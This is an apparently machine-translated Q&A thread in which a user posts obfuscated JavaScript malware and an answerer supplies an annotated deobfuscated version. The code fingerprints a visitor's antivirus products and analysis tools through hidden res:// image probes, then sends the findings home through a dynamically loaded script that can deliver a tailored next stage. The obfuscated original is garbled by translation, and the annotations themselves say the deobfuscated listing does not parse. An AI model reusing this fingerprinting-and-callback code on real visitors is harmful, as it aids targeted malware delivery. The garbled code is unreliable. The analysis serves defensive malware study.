JavaScript恶意软件去混淆
我在JavaScript中发现了某种恶意软件。因为它很模糊,而且很长,我需要一些关于如何自动去泡沫的想法。逐行恢复会花费太多时间 抱歉代码太长,我不知道它现在在做什么。。。 我们开始: var raelpit=[], zfpamzl=0, cndelds=0, tclnil=0, tctidehr=0, uCa=0, datmpeb=false, 埃森特= YOTNRWCP tHXRzIKDmqcnoXkelPfOuAtCQ jpFreviqesaOhUe ZJbVLdMq 代替 /[wDLOCHMXqARZJmPjUFVkKIuQ]/g, .第20,0; 函数pbpiakdldrefdu{ Hntpeed=Hntpeed.replace/^/, ldrefdu+2; } 函数nrimsm押韵{ var uohsev; uohsev=document.createElement “msaptuostrdykixucn Dltyowyihhhhqkiaqzrlchpzlimcafgskdzfyitetwklysoyijamgdkgnmksr” 代替 /[WzfkHCAcyKZJOIQTPLMqYNtDBX]/g, .第16、3款; uohsev.style.display= “RSFCTKQHGWPJHEBTTYZETUICXUELNN HKCQZZNOZWOHMNEOOCNAWJSMQTE” 代替 /[CHhyWZXpckbaNQrUgTiMJqzO]/g, .第13、4款; vneltoas=oERRIK 0 ctstahj+= ildciea+ “LliwooCNPSBCSINERBEB qhzUJeGu,ySOsqgTZNWMgQXEyDvjeTUi” 代替 /[qOSGNWjUEsXlLQwDTCBJpZMz]/g, .第13、1款; ildciea++; } var nlmata=文档[ “Rysegznnktfa gpdocrptgswehcjinqprjakeatytcmgoeffoheylevmmentukfmoahqrrphozvdr” 代替 /[gonfjdvgkqazvpydhrchwpmit]/g, .第13、13段] “ELZSDBGAMUPPJDVv VLFHXIYGQDNWGOABZBPSI KTESCFRXHEHOHIDRGYCWGPWLEJMOYEHWSFBLHPISI” 代替 /[MGDEBILypHvbSJOCzRXoPVWF]/g, .第18、2款+ “PPVyptrwSifyhrlxRaviptngingiqmwteslkf LbMOkCsjVWGztMoVur” 代替 /[jwKbSMFgWvPOCGaqzImxVRsLh]/g, .第6、4款; 恩尔马塔[ “MBdQDhogneFIrnWlAPJWjpsDx mpvqBcXxiiGfBhYuJOKshUrcrCLyilQxbdlFee” 代替 /[WhgQFKJBLYGMfDOXCxPUqjAIo]/g, .第16条第3款]= 'mViEuZlOFaEZqtuKnCUqwnCKjlovxLr.htpm?eqkswfpkcdd' 代替 /[aFCpZqKdLVDwOrPUoEWk]/g, .8,9+数学 .随机的+ “MXiZAQHnTfnkcAjpau,lrkxxtezwdfsfbdex EusNeEnKVIslTBgPCm” 代替 /[EHCBMIPZUFDXAQXLFKBRTNJTKV]/g, .第6、1款+ ctstahjh; var yilwre=document.body; yilwre.insertBeforenlmata,yilwre.firstChild; }Javascript恶意软件除臭,javascript,malware,deobfuscation,Javascript,Malware,Deobfuscation,我在JavaScript中发现了某种恶意软件。因为它很模糊,而且很长,我需要一些关于如何自动去泡沫的想法。逐行恢复会花费太多时间 抱歉代码太长,我不知道它现在在做什么。。。 我们开始: var raelpit=[], zfpamzl=0, cndelds=0, tclnil=0, tctidehr=0, uCa=0, datmpeb=false, 埃森特= YOTNRWCP tHXRzIKDmqcnoXkelPfOuAtCQ jpFreviqesaOhUe ZJbVLdMq 代替 /[wDLO
我把 setTimeout 函数赋给了一个变量,然后用这个变量来观察它做了什么,但这并不是特别有用。我认为有几种方法可以解决这个问题,但第一步肯定是先把它解码。我不介意把解码结果贴在这里,因为它自己无法运行——至少有一个变量没有定义。希望这能帮你们省点工作 =)
// Deobfuscated shared state for the probe routines below.
// raelpit collects the hidden <img> elements created by nrimsm(); stwsiis()
// later walks it to report which probes "loaded" (i.e. which files exist).
var raelpit = [],
// zfpamzl, cndelds, tclnil, tctidehr and ucaeggs are never read anywhere in
// this listing — they look like dead variables left by the obfuscation layer.
zfpamzl = 0,
cndelds = 0,
tclnil = 0,
tctidehr = 0,
ucaeggs = 0,
// datmpeb: one-shot guard so stwsiis() reports only once.
datmpeb = false,
// esrent: reassigned further down to what appears to be a path separator;
// its backslash escaping was lost when the listing was posted.
esrent = '';
// Prepends `ldrefdu + 2` to the global hntpeeed. ldrefdu is a string when
// called (dfrrtgrn), so `+ 2` is string concatenation ("...2"), not arithmetic.
// Called once below; together with the esrent pieces this appears to assemble
// a Windows system-directory prefix for the *.sys probes. The exact text cannot
// be recovered from this listing because backslash escapes were lost.
function pbpiakd(ldrefdu) {
hntpeeed = hntpeeed.replace(/^/, ldrefdu + 2); // replace(/^/, x) is just "prepend x"
}
// Probe for one local file. Creates a hidden <img> whose src points at the
// path `rhteayms` through a non-http scheme (iyslenda, assembled by the timer
// loop further down; it evidently spells out 'res', IE's resource protocol).
// Whether the image "loads" is what stwsiis() later reads back, so each call is
// effectively an existence check for one file on the visitor's disk. The paths
// probed below belong to security products, Fiddler and OpenVPN — environment
// fingerprinting ahead of a later stage.
function nrimsm(rhteayms) {
var uohsev = document.createElement('img');
uohsev.style.display = 'none';
// vneltoas is not defined =/  (reading the undeclared `oerriik` throws a
// ReferenceError, so as posted this function cannot run; `<< 4` suggests a
// numeric id was intended here)
vneltoas = oerriik << 4;
// Builds "<path>/#<id>/_1"; the "_" becomes "#" two lines down, giving "/#1".
vneltoas = rhteayms + '/#' + vneltoas + '/' + '_1';
// Remembers the probed path on the element itself (custom property).
uohsev['tpyjyvz'] = rhteayms;
vneltoas = vneltoas.replace('_', '#');
// Keep the element so stwsiis() can inspect it after the load settles.
raelpit.push(uohsev);
// CURRENT SITE STARTS WITH HTTP?... The next line takes a substring and
// then replaces part of it with the value of iyslenda... If the site starts with
// http:// then you can just assume the final code will be 'iyslenda://' + vneltoas;
// In this case, I've rewritten it to do the same thing but cleaner. That is unless
// the document ISN'T http but ftp or something else, of course. =)
// (Reviewer: the original expression is not shown, so the exact URL shape is
// uncertain; the key point is that the scheme is swapped for iyslenda.)
uohsev['setAttribute']('src', iyslenda + '://' + this.document.location.href.substr(7) + vneltoas);
// Inserted at the top of <body>; display:none hides it but the request still
// fires. Detection hint: hidden <img> elements whose src uses res:// (or any
// non-http scheme) are a strong indicator of this file-probing technique.
var vlldlsy = document.body;
vlldlsy.insertBefore(uohsev, vlldlsy.firstChild);
}
// Path fragments. The backslashes in these literals are unescaped as posted, so
// this listing does not parse verbatim ("\" escapes the closing quote); the
// original presumably used "\\". Intent appears to be a path separator and the
// start of a Windows system path (mixed case is harmless on Windows and likely
// just obfuscation).
esrent = "\";
dfrrtgrn = "C:\wIndOws\sY";
// Probes both Program Files directories for the relative path `rhteayms`
// (used below with security-product install paths). Each call issues two
// nrimsm() probes, i.e. two hidden <img> requests.
function rreiqsfd(rhteayms) {
nrimsm("C:\Program Files\" + rhteayms);
nrimsm("C:\Program Files (x86)\" + rhteayms);
}
// Continues the system-path prefix (as posted the two dfrrtgrn pieces simply
// concatenate; the intended result is presumably a system32-style path).
dfrrtgrn += "C:\wIndOws\sYstem3";
// hntpeeed becomes the prefix for the *.sys probes after the esrent/pbpiakd steps.
var hntpeeed = 'drivers';
// iyslenda starts as 'e' and is grown into a URL scheme by the timer below.
var iyslenda = 'e';
// Timer loop that assembles the scheme name one character at a time, so the
// string 'res' never appears literally (defeats simple string scanning).
// From 'e' it prepends 'r' (20%) or appends 's' (80%) each tick and stops once
// the length reaches 3. The replace() was meant to collapse repeated letters
// ('rre' -> 're', 'ess' -> 'es'), which makes 'res' the only possible 3-char
// result — but as posted its return value is discarded, and there is a stray
// '}' after the if/else, so this block is syntactically broken (most likely a
// transcription artifact of the deobfuscation rather than original behaviour).
setTimeout(function() {
if (Math.random() < 0.2) {
iyslenda = 'r' + iyslenda;
}
else {
iyslenda += 's';
}
}
// Intended: iyslenda = iyslenda.replace(...) — collapse runs of a repeated char.
iyslenda.replace(/(.)\1+/g, '$1');
if (iyslenda.length < 3) {
// Re-arm until the scheme is complete (arguments.callee is this function).
setTimeout(arguments.callee, 1)
}
}, 1);
// Finish the driver prefix: esrent (separator) on both sides of 'drivers', then
// dfrrtgrn + "2" prepended via pbpiakd() — intent is something like
// "<system dir>2\drivers\"; the exact string is unrecoverable here (escapes lost).
hntpeeed += esrent;
hntpeeed = esrent + hntpeeed;
pbpiakd(dfrrtgrn);
// Main probe list, fired after 1.5 s. Every line inside is one existence check
// (via nrimsm/rreiqsfd) for a file belonging to an installed security product
// or analysis tool: Malwarebytes, Avast, Norton/Symantec, F-Secure, Kaspersky
// and Trend Micro drivers/executables, plus Fiddler (a debugging proxy) and
// OpenVPN. This is AV / analyst-environment fingerprinting; stwsiis() is
// scheduled 1 s later to report the results to the server.
setTimeout(function() {
{
// acpi.sys ships with every Windows install, so this may act as a positive
// control for the technique itself (inference — not stated in the code).
nrimsm(hntpeeed + 'aCpI.sys');
// The only probe without the system prefix; unclear whether that is deliberate
// or a deobfuscation artifact.
nrimsm('iyQXFlpc.sys');
// Malwarebytes drivers and executables.
nrimsm(hntpeeed + 'mbam.sys');
nrimsm(hntpeeed + 'MBAMSwissArmy.sys');
nrimsm(hntpeeed + 'mwac.sys');
nrimsm(hntpeeed + 'mbamchameleon.sys');
rreiqsfd('Malwarebytes Anti-Exploit\mbae.exe');
rreiqsfd('Malwarebytes Anti-Malware\mbam.exe');
// Avast, Norton, F-Secure.
rreiqsfd('AVAST Software\Avast\AvastUI.exe');
rreiqsfd('norton security\Branding\muis.dll');
rreiqsfd('norton internet security\Branding\muis.dll');
rreiqsfd('F-Secure\trigger.exe');
nrimsm(hntpeeed + 'fsbts.sys');
// Kaspersky product family (version-specific paths).
var siatsii = 'Kaspersky Lab\Kaspersky ';
rreiqsfd(siatsii + 'Total Security 15.0.2\avpui.exe');
rreiqsfd(siatsii + 'Internet Security 15.0.2\avpui.exe')
rreiqsfd(siatsii + 'Anti-Virus 15.0.2\avpui.exe');
rreiqsfd(siatsii + 'Small Office Security 3\starter_avp.exe');
nrimsm(hntpeeed + 'driverskbfilter.sys');
// Trend Micro consumer and enterprise agents.
var sosvaki = 'Trend Micro\';
rreiqsfd(sosvaki + 'Titanium\UIFramework\uiWinMgr.exe');
rreiqsfd(sosvaki + 'TMIDS\PwmConsole.exe');
rreiqsfd('Security Agent\PCCNtMon.exe');
rreiqsfd('Client Server Security Agent\PccNTMon.exe');
rreiqsfd('Security Server\PCCSRV\Apache2\bin\ApacheMonitor.exe');
rreiqsfd('Browser Guard\BGUi.exe');
// Analysis / research tooling: a local Fiddler or OpenVPN install suggests a
// researcher or sandbox rather than an ordinary victim.
rreiqsfd('Fiddler2\Fiddler.exe');
rreiqsfd('Fiddler4\Fiddler.exe');
rreiqsfd('OpenVPN\Uninstall.exe');
// Symantec.
rreiqsfd('Symantec\LiveUpdate\MSVCR71.dll');
rreiqsfd('Common Files\Symantec Shared\ccEvtMgr.exe');
}
// Give the image loads a second to settle, then report.
setTimeout(stwsiis, 1000);
}, 1500);
// Reporting stage; runs at most once (datmpeb guard). For each hidden <img>
// probe it reads `fileUpdatedDate` (a legacy IE image property): an empty
// string is treated as "file not present", anything else — or an exception —
// as "present" (note the catch sets found = true, so read failures are reported
// as hits). The positions of the hits, comma-separated, are appended to the
// query string of a <script> fetched from the page's own origin
// ('jlvx.htm?<random>,<indices>'), so the serving host learns which security
// products are installed and can answer with a tailored next stage that runs
// immediately as script.
// Detection: a dynamically inserted <script src="...htm?<number>,<list>">
// shortly after a burst of hidden <img> requests; the Math.random() part is a
// cache-buster. Mitigation: the probing depends on a non-http scheme that only
// legacy IE honours (res://, if that is what iyslenda resolves to), so modern
// browsers are not affected; blocking that scheme defeats the fingerprinting.
function stwsiis() {
if (datmpeb)
return;
datmpeb = true;
var ctstahjh = '',
ildciea = 0;
// for...in over an array (sloppy, but ildciea just counts probe order).
for (var i in raelpit) {
var found = false;
try {
if (raelpit[i]['fileUpdatedDate'] == '')
found = false;
else
found = true;
} catch (e) {
found = true;
}
// `found > 0` is merely a truthiness test on the boolean.
if (found > 0)
ctstahjh += ildciea + ',';
ildciea++;
}
var nlmata = document['createElement']('script');
nlmata['src'] = 'jlvx.htm?' + Math.random() + ',' + ctstahjh;
var yilwre = document.body;
yilwre.insertBefore(nlmata,yilwre.firstChild);
}
是的,我肯定会说那里有些可疑的东西 ;-)
小心
另外,很抱歉语法高亮不对。现在我能做的只有这么多,我必须离开了,抱歉……你可以在一个安全、隔离的环境(VirtualBox 或 VMware)中运行这个恶意软件;我认为了解这段 JS 在做什么的最好方法,就是在控制台或浏览器中运行它。如果你想在控制台中运行它,可以使用……(原文在此处截断)。也许你可以通过阅读源代码弄清楚它在做什么,但如果你实际运行了这个恶意软件,你就能百分之百地理解它在做什么。我希望这有帮助。
问候。在你去混淆之后打算做什么?它是在 script 标签里还是在 .js 文件里?虽然不太可能,但写它的人也许愚蠢到附带了一个 source map。